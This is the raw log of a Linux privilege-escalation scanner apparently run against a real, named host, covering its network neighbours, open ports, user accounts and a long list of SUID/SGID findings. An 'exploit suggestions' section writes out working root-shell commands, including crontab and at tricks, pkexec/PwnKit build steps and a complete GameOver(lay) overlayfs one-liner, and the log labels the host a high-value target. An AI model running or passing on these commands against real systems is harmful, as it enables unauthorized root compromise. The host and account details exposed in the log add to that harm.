chs02.logicit.net (103.172.142.22) at 00:50:56:9a:84:87 [ether] on ens160
? (103.172.142.7) at 64:d1:54:cd:94:40 [ether] on ens160
? (103.172.142.5) at d4:ca:6d:74:8e:27 [ether] on ens160
? (103.172.142.14) at 00:50:56:9a:a6:12 [ether] on ens160
cloudmail.gix.net.au (103.172.142.30) at 00:50:56:9a:dd:02 [ether] on ens160

 [1;37m[INFO]    [0m ═══ Internal Port Scan (top targets) ═══
 [1;37m[INFO]    [0m localhost:21 OPEN
 [1;37m[INFO]    [0m localhost:22 OPEN
 [1;37m[INFO]    [0m localhost:80 OPEN
 [1;37m[INFO]    [0m localhost:443 OPEN
 [1;37m[INFO]    [0m localhost:3306 OPEN
 [1;37m[INFO]    [0m localhost:5432 OPEN
 [1;37m[INFO]    [0m localhost:11211 OPEN
[0;37m  └─ completed in 1s[0m

[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
[1;32m[1m  📜 HISTORY & USERS[0m
[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
 [1;37m[INFO]    [0m ═══ History Files ═══

 [1;37m[INFO]    [0m ═══ Users ═══
 [1;37m[INFO]    [0m Users with login shell:
  [1;37m  logicit:x:1000:1000:logicit:/home/logicit:/bin/bash[0m
  [1;37m  postgres:x:116:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash[0m
  [1;37m  nocapi:x:1153:1155::/home2/nocapi:/bin/bash[0m
  [1;37m  newnocapi2:x:1166:1168::/home2/newnocapi2:/bin/bash[0m
  [1;37m  newnoc2:x:1167:1169::/home2/newnoc2:/bin/bash[0m
  [1;37m  Binary file /etc/passwd matches[0m
 [41m[1;37m CRITICAL [0m [1;31mUID 0 user → root::0:0:�d��:/root:/bin/bash[0m

 [1;37m[INFO]    [0m ═══ Readable Home Dirs ═══

[0;37m  └─ completed in 0s[0m

 [1;37m[INFO]    [0m 💡 Run with --monitor for 60s process monitoring (pspy-like)

[1;31m[1m
  ╔═══════════════════════════════════════════════════════╗
  ║              ★ TOP FINDINGS ★                        ║
  ╚═══════════════════════════════════════════════════════╝
[0m
  [1;31m[1] ★ CRITICAL → ★ Dangerous SUID → /usr/bin/crontab[0m
  [1;31m[2] ★ CRITICAL → ★ Dangerous SUID → /usr/bin/at[0m
  [1;31m[3] ★ CRITICAL → ★ Dangerous SUID → /usr/bin/mount[0m
  [1;31m[4] ★ CRITICAL → ★ Dangerous SUID → /usr/bin/pkexec[0m
  [1;31m[5] ★ CRITICAL → ★ Dangerous SUID → /snap/core18/2999/bin/mount[0m
  [1;31m[6] ★ CRITICAL → ★ Dangerous SUID → /snap/core18/2979/bin/mount[0m
  [1;31m[7] ★ CRITICAL → ★ Dangerous SUID → /snap/core20/2769/usr/bin/mount[0m
  [1;31m[8] ★ CRITICAL → ★ Dangerous SUID → /snap/core20/2866/usr/bin/mount[0m
  [1;31m[9] ★ CRITICAL → SUID binary with missing library → /snap/core18/2999/bin/ping[0m
  [1;31m[10] ★ CRITICAL → SUID binary with missing library → /snap/core18/2999/usr/lib/dbus-1.0/dbus-daemon-launch-helper[0m
  [1;31m[11] ★ CRITICAL → SUID binary with missing library → /snap/core18/2999/usr/lib/openssh/ssh-keysign[0m
  [1;31m[12] ★ CRITICAL → SUID binary with missing library → /snap/core18/2979/bin/ping[0m
  [1;31m[13] ★ CRITICAL → SUID binary with missing library → /snap/core18/2979/usr/lib/dbus-1.0/dbus-daemon-launch-helper[0m
  [1;31m[14] ★ CRITICAL → SUID binary with missing library → /snap/core18/2979/usr/lib/openssh/ssh-keysign[0m
  [1;31m[15] ★ CRITICAL → Potential credentials found![0m
  [1;31m[16] ★ CRITICAL → UID 0 user → root::0:0:�d��:/root:/bin/bash[0m
  [38;5;208m[17]   HIGH     → Custom/unusual SUID → /snap/core18/2999/bin/ping (owner: root)[0m
  [38;5;208m[18]   HIGH     → Custom/unusual SUID → /snap/core18/2999/bin/su (owner: root)[0m
  [38;5;208m[19]   HIGH     → Custom/unusual SUID → /snap/core18/2999/bin/umount (owner: root)[0m
  [38;5;208m[20]   HIGH     → Custom/unusual SUID → /snap/core18/2999/usr/bin/chfn (owner: root)[0m
  [38;5;208m[21]   HIGH     → Custom/unusual SUID → /snap/core18/2999/usr/bin/chsh (owner: root)[0m
  [38;5;208m[22]   HIGH     → Custom/unusual SUID → /snap/core18/2999/usr/bin/gpasswd (owner: root)[0m
  [38;5;208m[23]   HIGH     → Custom/unusual SUID → /snap/core18/2999/usr/bin/newgrp (owner: root)[0m
  [38;5;208m[24]   HIGH     → Custom/unusual SUID → /snap/core18/2999/usr/bin/passwd (owner: root)[0m
  [38;5;208m[25]   HIGH     → Custom/unusual SUID → /snap/core18/2999/usr/bin/sudo (owner: root)[0m
  [38;5;208m[26]   HIGH     → Custom/unusual SUID → /snap/core18/2999/usr/lib/dbus-1.0/dbus-daemon-launch-helper (owner: root)[0m
  [38;5;208m[27]   HIGH     → Custom/unusual SUID → /snap/core18/2999/usr/lib/openssh/ssh-keysign (owner: root)[0m
  [38;5;208m[28]   HIGH     → Custom/unusual SUID → /snap/core18/2979/bin/ping (owner: root)[0m
  [38;5;208m[29]   HIGH     → Custom/unusual SUID → /snap/core18/2979/bin/su (owner: root)[0m
  [38;5;208m[30]   HIGH     → Custom/unusual SUID → /snap/core18/2979/bin/umount (owner: root)[0m
  [38;5;208m[31]   HIGH     → Custom/unusual SUID → /snap/core18/2979/usr/bin/chfn (owner: root)[0m
  [38;5;208m[32]   HIGH     → Custom/unusual SUID → /snap/core18/2979/usr/bin/chsh (owner: root)[0m
  [38;5;208m[33]   HIGH     → Custom/unusual SUID → /snap/core18/2979/usr/bin/gpasswd (owner: root)[0m
  [38;5;208m[34]   HIGH     → Custom/unusual SUID → /snap/core18/2979/usr/bin/newgrp (owner: root)[0m
  [38;5;208m[35]   HIGH     → Custom/unusual SUID → /snap/core18/2979/usr/bin/passwd (owner: root)[0m
  [38;5;208m[36]   HIGH     → Custom/unusual SUID → /snap/core18/2979/usr/bin/sudo (owner: root)[0m
  [38;5;208m[37]   HIGH     → Custom/unusual SUID → /snap/core18/2979/usr/lib/dbus-1.0/dbus-daemon-launch-helper (owner: root)[0m
  [38;5;208m[38]   HIGH     → Custom/unusual SUID → /snap/core18/2979/usr/lib/openssh/ssh-keysign (owner: root)[0m
  [38;5;208m[39]   HIGH     → Custom/unusual SUID → /snap/core20/2769/usr/bin/chfn (owner: root)[0m
  [38;5;208m[40]   HIGH     → Custom/unusual SUID → /snap/core20/2769/usr/bin/chsh (owner: root)[0m
  [38;5;208m[41]   HIGH     → Custom/unusual SUID → /snap/core20/2769/usr/bin/gpasswd (owner: root)[0m
  [38;5;208m[42]   HIGH     → Custom/unusual SUID → /snap/core20/2769/usr/bin/newgrp (owner: root)[0m
  [38;5;208m[43]   HIGH     → Custom/unusual SUID → /snap/core20/2769/usr/bin/passwd (owner: root)[0m
  [38;5;208m[44]   HIGH     → Custom/unusual SUID → /snap/core20/2769/usr/bin/su (owner: root)[0m
  [38;5;208m[45]   HIGH     → Custom/unusual SUID → /snap/core20/2769/usr/bin/sudo (owner: root)[0m
  [38;5;208m[46]   HIGH     → Custom/unusual SUID → /snap/core20/2769/usr/bin/umount (owner: root)[0m
  [38;5;208m[47]   HIGH     → Custom/unusual SUID → /snap/core20/2769/usr/lib/dbus-1.0/dbus-daemon-launch-helper (owner: root)[0m
  [38;5;208m[48]   HIGH     → Custom/unusual SUID → /snap/core20/2769/usr/lib/openssh/ssh-keysign (owner: root)[0m
  [38;5;208m[49]   HIGH     → Custom/unusual SUID → /snap/core20/2866/usr/bin/chfn (owner: root)[0m
  [38;5;208m[50]   HIGH     → Custom/unusual SUID → /snap/core20/2866/usr/bin/chsh (owner: root)[0m
  [38;5;208m[51]   HIGH     → Custom/unusual SUID → /snap/core20/2866/usr/bin/gpasswd (owner: root)[0m
  [38;5;208m[52]   HIGH     → Custom/unusual SUID → /snap/core20/2866/usr/bin/newgrp (owner: root)[0m
  [38;5;208m[53]   HIGH     → Custom/unusual SUID → /snap/core20/2866/usr/bin/passwd (owner: root)[0m
  [38;5;208m[54]   HIGH     → Custom/unusual SUID → /snap/core20/2866/usr/bin/su (owner: root)[0m
  [38;5;208m[55]   HIGH     → Custom/unusual SUID → /snap/core20/2866/usr/bin/sudo (owner: root)[0m
  [38;5;208m[56]   HIGH     → Custom/unusual SUID → /snap/core20/2866/usr/bin/umount (owner: root)[0m
  [38;5;208m[57]   HIGH     → Custom/unusual SUID → /snap/core20/2866/usr/lib/dbus-1.0/dbus-daemon-launch-helper (owner: root)[0m
  [38;5;208m[58]   HIGH     → Custom/unusual SUID → /snap/core20/2866/usr/lib/openssh/ssh-keysign (owner: root)[0m
  [38;5;208m[59]   HIGH     → Dangerous SGID → /usr/bin/at[0m
  [1;33m[60]   MEDIUM   → Kernel 5.4.0-216-generic → overlayfs (CVE-2021-3493) possible on Ubuntu[0m
  [1;33m[61]   MEDIUM   → Ubuntu + Kernel 5.4.0-216-generic → GameOver(lay) CVE-2023-2640/32629[0m
  [1;33m[62]   MEDIUM   → pkexec found (version: 0.105-26ubuntu1.3) → check PwnKit CVE-2021-4034[0m
  [1;33m[63]   MEDIUM   → Custom SGID → /snap/core18/2999/sbin/pam_extrausers_chkpwd[0m
  [1;33m[64]   MEDIUM   → Custom SGID → /snap/core18/2999/sbin/unix_chkpwd[0m
  [1;33m[65]   MEDIUM   → Custom SGID → /snap/core18/2999/usr/bin/chage[0m
  [1;33m[66]   MEDIUM   → Custom SGID → /snap/core18/2999/usr/bin/expiry[0m
  [1;33m[67]   MEDIUM   → Custom SGID → /snap/core18/2999/usr/bin/ssh-agent[0m
  [1;33m[68]   MEDIUM   → Custom SGID → /snap/core18/2999/usr/bin/wall[0m
  [1;33m[69]   MEDIUM   → Custom SGID → /snap/core18/2979/sbin/pam_extrausers_chkpwd[0m
  [1;33m[70]   MEDIUM   → Custom SGID → /snap/core18/2979/sbin/unix_chkpwd[0m
  [1;33m[71]   MEDIUM   → Custom SGID → /snap/core18/2979/usr/bin/chage[0m
  [1;33m[72]   MEDIUM   → Custom SGID → /snap/core18/2979/usr/bin/expiry[0m
  [1;33m[73]   MEDIUM   → Custom SGID → /snap/core18/2979/usr/bin/ssh-agent[0m
  [1;33m[74]   MEDIUM   → Custom SGID → /snap/core18/2979/usr/bin/wall[0m

  [1;37mTotals: [1;31m16 critical[1;37m | [38;5;208m43 high[1;37m | [1;33m15 medium[0m

[1;32m[1m
  ╔═══════════════════════════════════════════════════════╗
  ║           ⚔  EXPLOIT SUGGESTIONS  ⚔                 ║
  ╚═══════════════════════════════════════════════════════╝
[0m
  [1;31m┌─────────────────────────────────────────────────────┐[0m
  [1;31m│ ★ suid-crontab[0m
  [1;31m├─────────────────────────────────────────────────────┤[0m
  [1;37m│ WHY: GTFOBins: crontab via suid → root shell[0m
  [1;36m│ CMD: /usr/bin/crontab -e  # add: * * * * * chmod +s /bin/bash[0m
  [1;31m└─────────────────────────────────────────────────────┘[0m

  [1;31m┌─────────────────────────────────────────────────────┐[0m
  [1;31m│ ★ suid-at[0m
  [1;31m├─────────────────────────────────────────────────────┤[0m
  [1;37m│ WHY: GTFOBins: at via suid → root shell[0m
  [1;36m│ CMD: echo '/bin/bash -p > /tmp/rootsh' | /usr/bin/at now[0m
  [1;31m└─────────────────────────────────────────────────────┘[0m

  [1;31m┌─────────────────────────────────────────────────────┐[0m
  [1;31m│ ★ suid-mount[0m
  [1;31m├─────────────────────────────────────────────────────┤[0m
  [1;37m│ WHY: GTFOBins: mount via suid → root shell[0m
  [1;36m│ CMD: /usr/bin/mount -o bind /bin/bash /usr/bin/target[0m
  [1;31m└─────────────────────────────────────────────────────┘[0m

  [1;31m┌─────────────────────────────────────────────────────┐[0m
  [1;31m│ ★ suid-pkexec[0m
  [1;31m├─────────────────────────────────────────────────────┤[0m
  [1;37m│ WHY: GTFOBins: pkexec via suid → root shell[0m
  [1;36m│ CMD: /usr/bin/pkexec /bin/bash  # or PwnKit CVE-2021-4034[0m
  [1;31m└─────────────────────────────────────────────────────┘[0m

  [1;31m┌─────────────────────────────────────────────────────┐[0m
  [1;31m│ ★ suid-lib-hijack-ping[0m
  [1;31m├─────────────────────────────────────────────────────┤[0m
  [1;37m│ WHY: SUID shared library hijack → load malicious .so as root[0m
  [1;36m│ CMD: # Create malicious .so matching missing lib name in a writable LD path[0m
  [1;31m└─────────────────────────────────────────────────────┘[0m

  [1;31m┌─────────────────────────────────────────────────────┐[0m
  [1;31m│ ★ suid-lib-hijack-dbus-daemon-launch-helper[0m
  [1;31m├─────────────────────────────────────────────────────┤[0m
  [1;37m│ WHY: SUID shared library hijack → load malicious .so as root[0m
  [1;36m│ CMD: # Create malicious .so matching missing lib name in a writable LD path[0m
  [1;31m└─────────────────────────────────────────────────────┘[0m

  [1;31m┌─────────────────────────────────────────────────────┐[0m
  [1;31m│ ★ suid-lib-hijack-ssh-keysign[0m
  [1;31m├─────────────────────────────────────────────────────┤[0m
  [1;37m│ WHY: SUID shared library hijack → load malicious .so as root[0m
  [1;36m│ CMD: # Create malicious .so matching missing lib name in a writable LD path[0m
  [1;31m└─────────────────────────────────────────────────────┘[0m

  [38;5;208m[>>] kernel-overlayfs[0m
  [0;37m     why: overlayfs local privesc on Ubuntu[0m
  [1;37m     cmd: searchsploit overlayfs  # or: 49688.c[0m

  [38;5;208m[>>] kernel-gameoverlay[0m
  [0;37m     why: GameOver(lay) Ubuntu overlayfs → root[0m
  [1;37m     cmd: unshare -rm sh -c 'mkdir l u w m && cp /u*/b*/p]am3 l/;setcap cap_setuid+eip l/p]am3;mount -t overlay overlay -o lowerdir=l,upperdir=u,workdir=w m && touch m/*;' && u/p]am3 -c 'setuid(0);system("id")'[0m

  [38;5;208m[>>] pwnkit[0m
  [0;37m     why: PwnKit pkexec local root (widely unpatched)[0m
  [1;37m     cmd: # Use: github.com/ly4k/PwnKit  OR  github.com/berdav/CVE-2021-4034  → cc -o pwnkit pwnkit.c && ./pwnkit[0m

  [38;5;208m[>>] custom-suid-ping[0m
  [0;37m     why: Non-standard SUID binary — likely CTF target, analyze it![0m
  [1;37m     cmd: strings /snap/core18/2999/bin/ping && ltrace /snap/core18/2999/bin/ping && strace /snap/core18/2999/bin/ping  # analyze custom binary[0m

  [38;5;208m[>>] custom-suid-su[0m
  [0;37m     why: Non-standard SUID binary — likely CTF target, analyze it![0m
  [1;37m     cmd: strings /snap/core18/2999/bin/su && ltrace /snap/core18/2999/bin/su && strace /snap/core18/2999/bin/su  # analyze custom binary[0m

  [38;5;208m[>>] custom-suid-umount[0m
  [0;37m     why: Non-standard SUID binary — likely CTF target, analyze it![0m
  [1;37m     cmd: strings /snap/core18/2999/bin/umount && ltrace /snap/core18/2999/bin/umount && strace /snap/core18/2999/bin/umount  # analyze custom binary[0m

  [38;5;208m[>>] custom-suid-chfn[0m
  [0;37m     why: Non-standard SUID binary — likely CTF target, analyze it![0m
  [1;37m     cmd: strings /snap/core18/2999/usr/bin/chfn && ltrace /snap/core18/2999/usr/bin/chfn && strace /snap/core18/2999/usr/bin/chfn  # analyze custom binary[0m

  [38;5;208m[>>] custom-suid-chsh[0m
  [0;37m     why: Non-standard SUID binary — likely CTF target, analyze it![0m
  [1;37m     cmd: strings /snap/core18/2999/usr/bin/chsh && ltrace /snap/core18/2999/usr/bin/chsh && strace /snap/core18/2999/usr/bin/chsh  # analyze custom binary[0m

  [38;5;208m[>>] custom-suid-gpasswd[0m
  [0;37m     why: Non-standard SUID binary — likely CTF target, analyze it![0m
  [1;37m     cmd: strings /snap/core18/2999/usr/bin/gpasswd && ltrace /snap/core18/2999/usr/bin/gpasswd && strace /snap/core18/2999/usr/bin/gpasswd  # analyze custom binary[0m

  [38;5;208m[>>] custom-suid-newgrp[0m
  [0;37m     why: Non-standard SUID binary — likely CTF target, analyze it![0m
  [1;37m     cmd: strings /snap/core18/2999/usr/bin/newgrp && ltrace /snap/core18/2999/usr/bin/newgrp && strace /snap/core18/2999/usr/bin/newgrp  # analyze custom binary[0m

  [38;5;208m[>>] custom-suid-passwd[0m
  [0;37m     why: Non-standard SUID binary — likely CTF target, analyze it![0m
  [1;37m     cmd: strings /snap/core18/2999/usr/bin/passwd && ltrace /snap/core18/2999/usr/bin/passwd && strace /snap/core18/2999/usr/bin/passwd  # analyze custom binary[0m

  [38;5;208m[>>] custom-suid-sudo[0m
  [0;37m     why: Non-standard SUID binary — likely CTF target, analyze it![0m
  [1;37m     cmd: strings /snap/core18/2999/usr/bin/sudo && ltrace /snap/core18/2999/usr/bin/sudo && strace /snap/core18/2999/usr/bin/sudo  # analyze custom binary[0m

  [38;5;208m[>>] custom-suid-dbus-daemon-launch-helper[0m
  [0;37m     why: Non-standard SUID binary — likely CTF target, analyze it![0m
  [1;37m     cmd: strings /snap/core18/2999/usr/lib/dbus-1.0/dbus-daemon-launch-helper && ltrace /snap/core18/2999/usr/lib/dbus-1.0/dbus-daemon-launch-helper && strace /snap/core18/2999/usr/lib/dbus-1.0/dbus-daemon-launch-helper  # analyze custom binary[0m

  [38;5;208m[>>] custom-suid-ssh-keysign[0m
  [0;37m     why: Non-standard SUID binary — likely CTF target, analyze it![0m
  [1;37m     cmd: strings /snap/core18/2999/usr/lib/openssh/ssh-keysign && ltrace /snap/core18/2999/usr/lib/openssh/ssh-keysign && strace /snap/core18/2999/usr/lib/openssh/ssh-keysign  # analyze custom binary[0m


[1;36m  ┌──────────────────────────────────────┐[0m
[1;36m  │       SECTION TIMINGS                │[0m
[1;36m  ├──────────────────────────────────────┤[0m
[1;36m  │[0m  environment            [1;37m  0s[0m        [1;36m│[0m
[1;36m  │[0m  quick_wins             [1;37m 10s[0m        [1;36m│[0m
[1;36m  │[0m  system                 [1;37m  0s[0m        [1;36m│[0m
[1;36m  │[0m  sudo                   [1;37m  0s[0m        [1;36m│[0m
[1;36m  │[0m  suid_sgid              [1;37m 16s[0m        [1;36m│[0m
[1;36m  │[0m  capabilities           [1;37m 10s[0m        [1;36m│[0m
[1;36m  │[0m  cron                   [1;37m  2s[0m        [1;36m│[0m
[1;36m  │[0m  containers             [1;37m  0s[0m        [1;36m│[0m
[1;36m  │[0m  filesystem             [1;37m  8s[0m        [1;36m│[0m
[1;36m  │[0m  deep_scan              [1;37m  3s[0m        [1;36m│[0m
[1;36m  │[0m  network                [1;37m  1s[0m        [1;36m│[0m
[1;36m  │[0m  history_users          [1;37m  0s[0m        [1;36m│[0m
[1;36m  └──────────────────────────────────────┘[0m

[1;32m[1m
  ╔═══════════════════════════════════════════════════════╗
  ║                  FINAL SUMMARY                       ║
  ╚═══════════════════════════════════════════════════════╝
[0m
  [1;37mScore: [1;31m████████████████████████████████████████[0;37m░ [1;37m565[0m

  [41m[1;37m[1m  ★★★  HIGH VALUE TARGET — MULTIPLE ROOT PATHS LIKELY  ★★★  [0m

  [1;36mRisk Score  : [1;37m565[0m
  [1;36mFindings    : [1;37m85[0m
  [1;36mExploits    : [1;37m21[0m
  [1;36mTotal Time  : [1;37m50s[0m
  [1;36mMode        : [1;37mFULL[0m
  [1;36mHost        : [1;37mchs01.logicit.net / rehab[0m
  [1;36mTimestamp   : [1;37mMon 18 May 2026 08:52:31 PM AWST[0m
  [1;36mLog File    : [1;37m/tmp/d3pr2_chs01.logicit.net_1779108701.log[0m

  [1;32m[1md3pr2 v4 — na3er :: scan complete ✓[0m